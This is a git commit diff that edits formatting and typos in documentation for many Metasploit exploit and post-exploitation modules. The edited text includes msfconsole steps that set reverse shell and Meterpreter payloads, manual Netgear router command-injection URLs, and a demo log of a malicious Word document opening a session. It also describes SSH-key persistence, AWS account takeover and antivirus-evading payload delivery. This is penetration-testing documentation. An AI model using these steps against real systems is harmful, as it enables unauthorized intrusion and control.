Land #9493 updates to various docs
parent
64c0d60fbf
commit
5457cec81c
|
@ -1,4 +1,6 @@
|
||||||
MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
|
## Introduction
|
||||||
|
|
||||||
|
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
|
||||||
|
|
||||||
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
|
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
|
||||||
|
|
||||||
|
|
|
@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
1. Do: `use auxiliary/gather/censys_search`
|
1. Do: `use auxiliary/gather/censys_search`
|
||||||
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
|
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
|
||||||
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
|
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
|
||||||
4. Do: `set CENSYS_SEARCHTYPE certificates`
|
4. Do: `set CENSYS_SEARCHTYPE certificates`
|
||||||
5: Do: `set CENSYS_DORK rapid7`
|
5: Do: `set CENSYS_DORK query`
|
||||||
6: Do: `run`
|
6: Do: `run`
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
|
@ -1,8 +1,9 @@
|
||||||
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not.
|
## Introduction
|
||||||
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
|
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
|
||||||
|
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
|
||||||
|
|
||||||
#### NOTE:
|
#### NOTE:
|
||||||
In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
|
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
|
||||||
3. Do: `set TARGET <targetip>`
|
3. Do: `set TARGET <targetip>`
|
||||||
4. Do: `set SHODAN_APIKEY <your apikey>`
|
4. Do: `set SHODAN_APIKEY <your apikey>`
|
||||||
5. Do: `run`
|
5. Do: `run`
|
||||||
6. If the API is up, you should recieve a score from 0.0 to 1.0.
|
6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
**TARGET**
|
**TARGET**
|
||||||
|
|
||||||
The remote host to request the API to scan.
|
The remote host to request the API to scan.
|
||||||
|
|
||||||
**SHODAN_APIKEY**
|
**SHODAN_APIKEY**
|
||||||
|
|
||||||
This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
|
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
|
||||||
|
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
|
|
|
@ -7,8 +7,8 @@
|
||||||
1. start `msfconsole`
|
1. start `msfconsole`
|
||||||
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
|
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
|
||||||
3. `set RHOST 192.168.1.1` `<--- Router IP`
|
3. `set RHOST 192.168.1.1` `<--- Router IP`
|
||||||
4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
|
4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
|
||||||
5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
|
5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
|
||||||
5. `set PAYLOAD cmd/unix/reverse_bash`
|
5. `set PAYLOAD cmd/unix/reverse_bash`
|
||||||
6. `set LHOST 192.168.1.x`
|
6. `set LHOST 192.168.1.x`
|
||||||
7. `set LPORT xxxx`
|
7. `set LPORT xxxx`
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
|
## Introduction
|
||||||
|
The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
|
@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
|
**CUSTOMTEMPLATE**
|
||||||
|
|
||||||
|
A docx file that will be used as a template to build the exploit.
|
||||||
|
|
||||||
## Trusted Document
|
## Trusted Document
|
||||||
|
|
||||||
|
|
|
@ -1,10 +1,12 @@
|
||||||
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
## Introduction
|
||||||
Vulnerable OS: all OS images available for Orange Pis,
|
|
||||||
|
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
||||||
|
Vulnerable OS: all OS images available for Orange Pis,
|
||||||
any for FriendlyARM's NanoPi M1,
|
any for FriendlyARM's NanoPi M1,
|
||||||
SinoVoip's M2+ and M3,
|
SinoVoip's M2+ and M3,
|
||||||
Cuebietech's Cubietruck +
|
Cuebietech's Cubietruck +
|
||||||
Linksprite's pcDuino8 Uno
|
Linksprite's pcDuino8 Uno
|
||||||
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
||||||
|
|
||||||
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
|
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,5 @@
|
||||||
|
## Introduction
|
||||||
|
|
||||||
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
|
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
|
||||||
|
|
||||||
The web_delivery module supports three different languages for delivery: Python, PHP, and
|
The web_delivery module supports three different languages for delivery: Python, PHP, and
|
||||||
|
@ -5,6 +7,7 @@ Powershell. You should manually select the correct target based on the victim en
|
||||||
|
|
||||||
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
|
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
|
||||||
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:
|
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:
|
||||||
|
|
|
@ -7,8 +7,7 @@ A fix was released in the June 2017 Patch Tuesday.
|
||||||
|
|
||||||
## Vulnerable Setup
|
## Vulnerable Setup
|
||||||
|
|
||||||
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
|
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
### Start a handler
|
### Start a handler
|
||||||
|
@ -16,7 +15,6 @@ To set up the vulnerable environment, install a Windows version without the patc
|
||||||
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
|
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
|
||||||
3. `set LHOST [ip victim connects back to]`
|
3. `set LHOST [ip victim connects back to]`
|
||||||
4. `exploit -j`
|
4. `exploit -j`
|
||||||
5. `back`
|
|
||||||
|
|
||||||
### Run the exploit
|
### Run the exploit
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
|
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
|
@ -1,7 +1,8 @@
|
||||||
|
## Introduction
|
||||||
|
|
||||||
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
|
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Applications
|
||||||
|
|
||||||
- Microsoft Office 2016
|
- Microsoft Office 2016
|
||||||
- Microsoft Office 2013 Service Pack 1
|
- Microsoft Office 2013 Service Pack 1
|
||||||
|
@ -15,6 +16,7 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe
|
||||||
3. Do: `set PAYLOAD [PAYLOAD]`
|
3. Do: `set PAYLOAD [PAYLOAD]`
|
||||||
4. Do: `run`
|
4. Do: `run`
|
||||||
|
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
### FILENAME
|
### FILENAME
|
||||||
Filename to output & if injecting a file, the file to inject
|
Filename to output & if injecting a file, the file to inject
|
||||||
|
|
|
@ -1,11 +1,13 @@
|
||||||
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
|
## Introduction
|
||||||
|
|
||||||
|
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Visual Basic for Application scripting language.
|
||||||
|
|
||||||
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
|
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
|
||||||
|
|
||||||
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
|
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Applications
|
||||||
|
|
||||||
|
|
||||||
- Windows Vista Service Pack 2
|
- Windows Vista Service Pack 2
|
||||||
|
@ -41,8 +43,7 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
|
||||||
## Demo
|
## Demo
|
||||||
|
|
||||||
```
|
```
|
||||||
$ msfconsole
|
msf > use exploit/windows/fileformat/office_word_hta
|
||||||
msf > use exploit/windows/fileformat/office_word_hta
|
|
||||||
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
|
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
|
||||||
payload => windows/meterpreter/reverse_tcp
|
payload => windows/meterpreter/reverse_tcp
|
||||||
msf exploit(office_word_hta) > set lhost 192.168.146.1
|
msf exploit(office_word_hta) > set lhost 192.168.146.1
|
||||||
|
@ -52,7 +53,7 @@ srvhost => 192.168.146.1
|
||||||
msf exploit(office_word_hta) > run
|
msf exploit(office_word_hta) > run
|
||||||
[*] Exploit running as background job.
|
[*] Exploit running as background job.
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.146.1:4444
|
[*] Started reverse TCP handler on 192.168.146.1:4444
|
||||||
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
|
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
|
||||||
[*] Using URL: http://192.168.146.1:8080/default.hta
|
[*] Using URL: http://192.168.146.1:8080/default.hta
|
||||||
[*] Server started.
|
[*] Server started.
|
||||||
|
@ -65,4 +66,3 @@ and open it with Microsoft Office Word. You should receive a session:
|
||||||
[*] Sending stage (957487 bytes) to 192.168.146.145
|
[*] Sending stage (957487 bytes) to 192.168.146.145
|
||||||
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
|
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -20,7 +20,7 @@
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
###VX Search Enterprise v9.5.12 on Windows 7 SP1
|
### VX Search Enterprise v9.5.12 on Windows 7 SP1
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(vxsrchs_bof) > show options
|
msf exploit(vxsrchs_bof) > show options
|
||||||
|
|
|
@ -21,7 +21,7 @@
|
||||||
and manually create a job handler corresponding to the payload.
|
and manually create a job handler corresponding to the payload.
|
||||||
|
|
||||||
|
|
||||||
##Scenario
|
## Scenario
|
||||||
|
|
||||||
```
|
```
|
||||||
msf >
|
msf >
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
## Intro
|
## Intro
|
||||||
|
|
||||||
This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
|
This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
|
|
||||||
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. From here, running the module will result in the payload being executed with system level privileges.
|
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the `payload` and `session` options. From here, running the module will result in the payload being executed with system level privileges.
|
||||||
|
|
||||||
An example session follows:
|
An example session follows:
|
||||||
|
|
||||||
|
|
|
@ -14,11 +14,11 @@
|
||||||
Example steps in this format:
|
Example steps in this format:
|
||||||
|
|
||||||
1. Install the application
|
1. Install the application
|
||||||
2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
|
2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
|
||||||
3. Start msfconsole
|
3. Start msfconsole
|
||||||
4. Get a shell
|
4. Get a shell
|
||||||
5. Do: `use exploit/windows/local/panda_psevents`
|
5. Do: `use exploit/windows/local/panda_psevents`
|
||||||
6. Do: `set session #`
|
6. Do: `set session [ID]`
|
||||||
7. Do: `exploit`
|
7. Do: `exploit`
|
||||||
8. Go do something else while you wait
|
8. Go do something else while you wait
|
||||||
9. Enjoy being system with your shell
|
9. Enjoy being system with your shell
|
||||||
|
@ -151,4 +151,4 @@ Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
|
||||||
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
|
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
|
||||||
Faulting package full name:
|
Faulting package full name:
|
||||||
Faulting package-relative application ID:
|
Faulting package-relative application ID:
|
||||||
```
|
```
|
||||||
|
|
|
@ -11,7 +11,7 @@ context of SYSTEM.
|
||||||
|
|
||||||
HP Data Protector versions 7, 8, and 9 are known to be affected.
|
HP Data Protector versions 7, 8, and 9 are known to be affected.
|
||||||
|
|
||||||
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
|
This module was tested against version 9.0.0 on Windows 2008.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
|
|
@ -1,8 +1,8 @@
|
||||||
ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the
|
ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the
|
||||||
Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is
|
Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is
|
||||||
considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows
|
considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows
|
||||||
user mode privilege, but also full control of the kernel in ring 0. In modern day penetration tests,
|
user mode privilege, but also full control of the kernel in [ring 0](https://en.wikipedia.org/wiki/Protection_ring). In modern day penetration tests,
|
||||||
this exploit can be found in internal and external environments.
|
this exploit can be used in internal and external environments.
|
||||||
|
|
||||||
As far as remote kernel exploits go, this one is highly reliable and safe to use.
|
As far as remote kernel exploits go, this one is highly reliable and safe to use.
|
||||||
|
|
||||||
|
@ -14,13 +14,10 @@ inadvertently added an information disclosure with extra checks on vulnerable co
|
||||||
|
|
||||||
This exploit works against a vulnerable SMB service from one of these Windows systems:
|
This exploit works against a vulnerable SMB service from one of these Windows systems:
|
||||||
|
|
||||||
[//]: # (https://stackoverflow.com/questions/4823468/comments-in-markdown)
|
|
||||||
|
|
||||||
[//]: # (* Windows XP x86 (All Service Packs))
|
* Windows XP x86 (All Service Packs))
|
||||||
|
* Windows 2003 x86 (All Service Packs))
|
||||||
[//]: # (* Windows 2003 x86 (All Service Packs))
|
* Windows 7 x86 (All Service Packs))
|
||||||
|
|
||||||
[//]: # (* Windows 7 x86 (All Service Packs))
|
|
||||||
* Windows 7 x64 (All Service Packs)
|
* Windows 7 x64 (All Service Packs)
|
||||||
* Windows 2008 R2 x64 (All Service Packs)
|
* Windows 2008 R2 x64 (All Service Packs)
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
Gathers several pieces of information from the vehicle. First it reports
|
## Introduction
|
||||||
|
This module gathers several pieces of information from the vehicle. First it reports
|
||||||
the available PIDS for pulling realtime current_data from Mode $01. If some of
|
the available PIDS for pulling realtime current_data from Mode $01. If some of
|
||||||
the common PIDs are returned it will print those as well, such as Engine Temp and
|
the common PIDs are returned it will print those as well, such as Engine Temp and
|
||||||
Vehicle speed. If there are any Diagnostic Trouble Codes (DTCs) it will list those.
|
Vehicle speed. If there are any Diagnostic Trouble Codes (DTCs) it will list those.
|
||||||
|
@ -22,7 +23,7 @@ PIDs to ASCII.
|
||||||
|
|
||||||
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
|
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
|
||||||
|
|
||||||
**CLEAR_DTCS***
|
**CLEAR_DTCS**
|
||||||
|
|
||||||
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).
|
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,5 @@
|
||||||
|
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
|
||||||
|
|
||||||
### Creating A Testing Environment
|
### Creating A Testing Environment
|
||||||
|
|
||||||
This module has been tested against:
|
This module has been tested against:
|
||||||
|
@ -22,15 +24,15 @@
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
**sshd_config**
|
**SSHD_CONFIG**
|
||||||
|
|
||||||
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys
|
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys
|
||||||
|
|
||||||
**username**
|
**USERNAME**
|
||||||
|
|
||||||
If set, we only write our key to this user. If not, we'll write to all users
|
If set, we only write our key to this user. If not, we'll write to all users
|
||||||
|
|
||||||
**PubKey**
|
**PUBKEY**
|
||||||
|
|
||||||
A public key to use. If not provided, a pub/priv key pair is generated automatically
|
A public key to use. If not provided, a pub/priv key pair is generated automatically
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# aws_create_iam_user
|
# Introduction
|
||||||
|
|
||||||
aws_create_iam_user is a simple post module that can be used to take over AWS
|
`aws_create_iam_user` is a simple post module that can be used to take over AWS
|
||||||
accounts. Sure, it is fun enough to take over a single host, but you can own all
|
accounts. Sure, it is fun enough to take over a single host, but you can own all
|
||||||
hosts in the account if you simply create an admin user.
|
hosts in the account if you simply create an admin user.
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,5 @@
|
||||||
|
## Introduction
|
||||||
|
|
||||||
This is a post exploitation module which has the effect of copying the AD groups, user membership
|
This is a post exploitation module which has the effect of copying the AD groups, user membership
|
||||||
(taking into account nested groups), user information and computers to a local SQLite database.
|
(taking into account nested groups), user information and computers to a local SQLite database.
|
||||||
This is particularly useful for red teaming and simulated attack engagements because it offers
|
This is particularly useful for red teaming and simulated attack engagements because it offers
|
||||||
|
|
|
@ -5,7 +5,6 @@ Having this feature as a post module allows it to be used in different penetrati
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
To be able to use post/gather/hash_dump, you must meet these requirements:
|
To be able to use post/gather/hash_dump, you must meet these requirements:
|
||||||
|
|
||||||
|
@ -15,13 +14,10 @@ To be able to use post/gather/hash_dump, you must meet these requirements:
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
Please see Overview for usage.
|
Please see Overview for usage.
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
**Upgrading to Meterpreter**
|
**Upgrading to Meterpreter**
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,5 @@
|
||||||
|
## Introduction
|
||||||
|
|
||||||
This module can be used to aid the generation of an organizational chart based on information
|
This module can be used to aid the generation of an organizational chart based on information
|
||||||
contained in Active Directory. The module itself uses ADSI to retrieve key information from AD
|
contained in Active Directory. The module itself uses ADSI to retrieve key information from AD
|
||||||
(manager, title, description etc) fields and then present it in a CSV file in the form:
|
(manager, title, description etc) fields and then present it in a CSV file in the form:
|
||||||
|
|
|
@ -12,13 +12,28 @@ This module was not tested against, but may work against:
|
||||||
|
|
||||||
1. Other versions of Windows that are x64.
|
1. Other versions of Windows that are x64.
|
||||||
|
|
||||||
## Verification Steps
|
## Options
|
||||||
|
|
||||||
|
**EXE**
|
||||||
|
|
||||||
|
The executable to start and migrate into. Default: `C:\windows\sysnative\svchost.exe`
|
||||||
|
|
||||||
|
**FALLBACK**
|
||||||
|
|
||||||
|
If the selected migration executable does not exist, fallback to a sysnative file. Default: `true`
|
||||||
|
|
||||||
|
**IGNORE_SYSTEM**
|
||||||
|
|
||||||
|
Migrate even if you have SYSTEM privileges. Default: `true`
|
||||||
|
|
||||||
|
|
||||||
|
### Verification Steps
|
||||||
|
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. Obatin a meterpreter session with an executable meterpreter via whatever method
|
2. Obtain a meterpreter session with an executable meterpreter via whatever method
|
||||||
3. Do: 'use post/windows/manage/archmigrate'
|
3. Do: `use post/windows/manage/archmigrate`
|
||||||
4. Do: 'set session #'
|
4. Do: `set session #`
|
||||||
5. Do: 'run'
|
5. Do: `run`
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
|
|
|
@ -25,7 +25,7 @@ The process will use the Start-Process command of powershell to run a process as
|
||||||
|
|
||||||
## Examples
|
## Examples
|
||||||
|
|
||||||
`
|
```
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: NT AUTHORITY\SYSTEM
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword
|
meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword
|
||||||
|
@ -46,5 +46,5 @@ meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword hidde
|
||||||
|
|
||||||
[*] Process 9768 created.
|
[*] Process 9768 created.
|
||||||
meterpreter >
|
meterpreter >
|
||||||
|
```
|
||||||
|
|
||||||
`
|
|
||||||
|
|
Loading…
Reference in New Issue